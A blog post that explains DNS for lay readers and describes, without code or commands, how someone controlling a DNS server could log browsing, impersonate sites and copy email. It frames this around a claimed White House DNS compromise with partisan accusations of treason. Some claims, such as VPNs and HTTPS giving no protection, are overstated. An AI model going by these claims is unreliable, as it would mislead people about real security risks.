It’s all over the news. The Durham investigation finds that the DNS server in the White House during the Trump presidency was compromised by political rivals. But what is a DNS Server, what is it for, and what can you do with one? If we watch the news, the left-wing networks are throwing their arms up, saying no big deal. After all, a DNS server only gets basic data. The right-wing networks are screaming espionage. Who to believe, and how big an issue is this? The reality is both claims are technically true, but the rabbit hole is significantly deeper than what we are hearing.
I am going to talk about what a DNS server is, and what I can do with it. I will further make an attempt to make this as simple as possible,
What is a DNS Server?
DNS stands for “Domain Name System.” OK, that probably didn’t help much for most readers. Imagine you are sitting here reading this on your computer, phone, or tablet right now. You decide you want to go to www.google.com. How does your device know how to find www.google.com?
It doesn’t. All your device can understand are IP numbers, like 127.210.123.111.
The internet would be a much more complicated place if we needed to remember all of these numbers, right? So in the early days of the internet, DNS was created to let us use friendly, easy-to-remember names for everything. For example, if you come to my blog by typing www.scrybe.com into a browser, your device contacts a DNS server to ask where to find www.scrybe.com. The DNS Server will reply, saying it is at 220.127.116.11, and your device will find the blog.
But if I controlled the DNS server your device uses, well… I could send you anywhere I want when you enter that address, and that anywhere can do all kinds of really nasty stuff, and you would never have a clue.
So, in the simplest of terms, DNS is the phone book of the internet, You type in a web address (or email address), and behind the scenes, your device contacts a DNS server somewhere to ask where to go. It then tells your device the address, and behind the scenes, you get where you want to go in milliseconds. At least that is what normally happens.
You probably know nothing about this, because when you connect to the internet, your devices are automatically configured to use the DNS servers your internet provider chooses. But in the very early days of the internet, if you were running a website, you had to either find someone to host your DNS with, or you had to run your own. The latter was very complicated.
What’s in an Expert?
These days, the word “expert” seems to be thrown around for just about anything, but I would say I am a pretty reliable resource in the world of experts on this topic. As I mentioned above, in the early days of the internet, running a DNS server was very complicated, and I ran a software company that specialized in creating Windows software for internet providers.
We realized that there was a great need for an easier-to-use DNS server, so we set out to create the first DNS server for Windows. So, to be clear, I know DNS well because I designed a DNS server and we created one. But I have also been managing multiple DNS servers for twenty-eight years.
What Can I Do With a DNS Server?
These servers are meant to simply act as a phonebook of sorts to help your devices go to the servers you want them to when you open a web page or send an email—or any of the other things one does on the internet. But what they are meant to do and what they can do make all the difference in the world.
At a minimum, and with almost no effort, if I set up your devices to use my DNS servers, I am able to log every website you visit. This can be very useful for data mining. For example, Google runs the most popular public DNS servers in the world for free. Millions of people use them. Do you think they are offering this service out of the kindness of their hearts, or is it more likely that they find value in knowing every website or other internet server your computer goes to, even if you are not using their search engine? That kind of data is priceless.
What if I Had More Nefarious Intentions?
This is where it gets scary. Because I can log all of that data and send you on your way, and you never know a thing. Even if you have a firewall, you have to allow permission for your device to communicate with the DNS server. And if I have the power to know where you want to go on the internet and also direct your device to the proper location, I also have the power to change that location!
Now consider the ramifications of that, I may see you frequently go to Google to search. Normally, I cannot see what you are searching for with a DNS server. But with a little effort, I can make a website that looks and acts exactly like Google. I can then instruct your devices to go to my server when you think you are going to Google. It would even show www.google.com on the search bar, and when you do a search, it could even produce actual results from Google. Now I know exactly what you are searching for and exactly where you are going.
It doesn’t matter where you go or what you are doing, I have hijacked all outbound connections. VPN? No problem. I am, still your DNS server. Do you like the privacy of a search engine like DuckDuckGo, or a browser like Brave? Me too, but if I have hijacked your DNS, none of that matters at all.
But I can kick that up a notch. I can see some basic data on emails you send. The data I can see is not enough to read your emails or get any real private information, but it is enough to give me the information I need to create a copy of the email server you are sending to, make my own server that operates just like the other one, copy every email you send, and then connect you to the original server you were supposed to go to without you knowing a thing. All of this in a few milliseconds.
I now have a copy of every email you send. I cannot see the emails people send you, but I sure can see what they wrote if you are replying to them.
This Just Scratches the Surface
What I described are just a few simple examples. The bigger point here is that if I control the DNS server you are using, I also control where all of your outbound connections go, and how they operate. I can steal all kinds of information, and you think your firewall or VPN is protecting you. All of this is behind the scenes in such a way that no red flags go up.
How Serious Is This?
Imagine you had an adversary that was able to bug every room in your building. This can easily be the internet version of that. I don’t care who the president is, which party they belong to, or whether you love him or hate him. If this is had been a foreign government doing this, it would be one of the most (if not the most) successful espionage operations in history. If an American did this, it is surely one of the greatest acts of treason in history. If a group of Americans did this, it is one of the biggest conspiracies to commit treason in history.
By comparison, Watergate was like knocking on a soda machine for a free coke.
Whatever you think of this, please sit back and recognize that the level of corruption we have gotten to is unthinkable. Some kid hacker could not have done this. It could only have been done as a very coordinated effort that included people in charge of network security at the White House. How does that happen? How big does this have to be to get to that level?
It is Not Just About the President
Most probably think that this specifically targeted Trump, as if targeting just Trump would be ok. But if you are on a network, those in charge of IT would not set DNS on just one computer, they would do it on the entire network. This means this would have been happening to every device connected to the internet in the White House. It is also very possible that inside traffic (traffic between devices on the network inside of the White House) would be similarly compromised.
Someone on the inside had to know. To believe otherwise would be to believe that the Secret Service leaves the White House gate untended and forgets to lock it.
Look it Up
This is where we get some hacking terms you may have heard of, like “Man in the Middle” attacks and “DNS Spoofing”. Simply search for those terms if you want to do a deep dive, or check out some of these sources: